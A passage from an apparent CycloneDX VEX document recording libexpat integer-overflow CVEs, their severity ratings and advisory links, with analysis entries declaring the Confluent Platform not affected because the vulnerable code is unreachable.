          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/coreutils-single@8.30-17.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-56403",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in storeAtts.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56403"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56403"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1232"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56403"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56403"
        }
      ],
      "published": "2026-06-21T16:16:26+00:00",
      "updated": "2026-06-23T20:15:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56404",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in addBinding.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56404"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56404"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1249"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56404"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56404"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T20:15:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56405",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in getAttributeId.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56405"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56405"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1251"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56405"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56405"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T20:14:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56406",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in XML_ParseBuffer because it lacked a check that was present in XML_Parse.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56406"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56406"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1255"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56406"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56406"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T16:29:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-56407",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "libexpat before 2.8.2 has an integer overflow in doProlog that is related to storeEntityValue and entity textLen.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56407"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56407"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1262"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56407"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56407"
        }
      ],
      "published": "2026-06-21T16:16:27+00:00",
      "updated": "2026-06-23T16:28:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
